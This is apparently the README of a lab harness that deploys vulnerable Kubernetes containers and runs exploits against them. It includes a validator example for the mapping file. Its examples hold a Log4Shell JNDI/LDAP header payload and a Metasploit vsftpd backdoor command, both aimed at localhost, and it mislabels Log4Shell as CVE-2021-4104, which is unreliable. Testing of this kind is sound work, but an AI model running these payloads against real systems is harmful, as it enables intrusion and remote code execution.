## https://sploitus.com/exploit?id=322DD1ED-D331-573E-9AAC-5B6BEC2095F9
# Container Exec - Python Script
Reads `attack-vuln-image-mapping.json`, deploys vulnerable containers via kubectl, and executes exploit commands on the host.
## Prerequisites
### System Requirements
- **Python 3.8+** (uses only standard library)
- **kubectl** - Kubernetes command-line tool
- **Metasploit Framework** - Required for FTP exploit (CVE-2011-2523)
### Installing Metasploit Framework
**Kali Linux (pre-installed):**
```bash
sudo msfupdate
```
**Ubuntu/Debian:**
```bash
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
```
**Windows:**
Download from: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
**macOS:**
```bash
brew install metasploit
```
### Verify Installation
```bash
msfconsole --version
kubectl version --client
python3 --version
```
## Usage
```bash
python container_exec.py
```
**Example:**
```bash
python container_exec.py ../attack-vuln-image-mapping.json
```
## How It Works
For each entry in the mapping file:
1. **Deploy container** - `kubectl apply -f `
2. **Wait for pod** - `kubectl wait --for=condition=Ready`
3. **Run exploit command** - Execute on host (before/after based on `command_run`)
4. **Cleanup** - `kubectl delete -f ` after 30 seconds
## Mapping File Format
```json
{
  "entry-name": {
    "file": "vulnerable-app.yaml",
    "image": "pod-name",
    "cve": "CVE-XXXX-XXXX",
    "command_run": "after",
    "command": "exploit command to run on host"
  }
}
```
- **`file`** - YAML file in `vul-images/` directory
- **`image`** - Pod name (used for kubectl wait)
- **`cve`** - CVE identifier
- **`command_run`** - `"before"` or `"after"` (when to run the command)
- **`command`** - Shell command to execute on the host machine
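Because `command` is run as a shell command on the host, a mapping file deserves a lint pass and a human review before it is handed to the runner. The checker below is an added example, not part of this project's script: the function names, the rule that `file` must be a bare name inside `vul-images/`, and the sample entries are assumptions constructed for illustration.

```python
import json
import re

REQUIRED = ("file", "image", "cve", "command_run", "command")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
POD_RE = re.compile(r"[a-z0-9]([-a-z0-9.]{0,251}[a-z0-9])?")  # DNS-1123 subdomain
# Assumption: `file` is a bare name resolved inside vul-images/, so no path parts allowed.
FILE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*\.ya?ml")

def validate_mapping(mapping):
    """Return sorted (entry, problem) pairs; an empty list means every entry passed."""
    problems = []
    for name, entry in mapping.items():
        if not isinstance(entry, dict):
            problems.append((name, "entry is not an object"))
            continue
        missing = [k for k in REQUIRED if not isinstance(entry.get(k), str) or not entry[k].strip()]
        problems += [(name, f"missing or empty field: {k}") for k in missing]
        checks = (
            ("file", FILE_RE.fullmatch, "file must be a bare .yaml/.yml name"),
            ("image", POD_RE.fullmatch, "image is not a valid pod name"),
            ("cve", CVE_RE.fullmatch, "cve is not in CVE-YYYY-NNNN form"),
            ("command_run", {"before", "after"}.__contains__, 'command_run must be "before" or "after"'),
        )
        for key, ok, message in checks:
            if key not in missing and not ok(entry[key]):
                problems.append((name, message))
    return sorted(problems)

def host_commands(mapping):
    """List (entry, when, command) for every shell command the runner would execute on the host."""
    return [(n, e.get("command_run"), e.get("command")) for n, e in mapping.items() if isinstance(e, dict)]

# Constructed sample: one well-formed entry and one that breaks every rule.
SAMPLE = json.loads("""{
  "good-entry": {"file": "demo-app.yaml", "image": "demo-app", "cve": "CVE-2011-2523",
                 "command_run": "after", "command": "echo constructed-placeholder"},
  "bad-entry":  {"file": "../outside/demo.yaml", "image": "Demo_App", "cve": "CVE-XXXX-XXXX",
                 "command_run": "during", "command": ""}
}""")

if __name__ == "__main__":
    for entry, problem in validate_mapping(SAMPLE):
        print(f"{entry}: {problem}")
    for entry, when, command in host_commands(SAMPLE):
        print(f"[{when}] {entry}: {command!r}")
```

The validator only checks shape; the `host_commands` listing is what a reviewer should read line by line, since nothing in the format restricts what `command` may contain.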
## Logs
Execution logs are written to: `logs/container-exec.log`
## Examples
### Log4Shell Exploit (CVE-2021-4104)
```json
{
  "CVE-2021-4104-log4shell": {
    "file": "log4j-java-vulnerable-app.yaml",
    "image": "log4j-java-vulnerable-app",
    "cve": "CVE-2021-4104",
    "command_run": "after",
    "command": "curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'"
  }
}
```
### FTP Exploit with Metasploit (CVE-2011-2523)
```json
{
  "CVE-2011-2523-ftp-exploit": {
    "file": "ftp-exp-vulnerable-app.yml",
    "image": "ftp-exp-vulnerable-app",
    "cve": "CVE-2011-2523",
    "command_run": "after",
    "command": "msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS localhost; run; exit'"
  }
}
```
## Notes
- Update `RHOSTS` in Metasploit commands to match your target IP
- Adjust `CONTAINER_RUN_SECONDS` in the script if exploits need more time
- Ensure kubectl is configured with the correct cluster context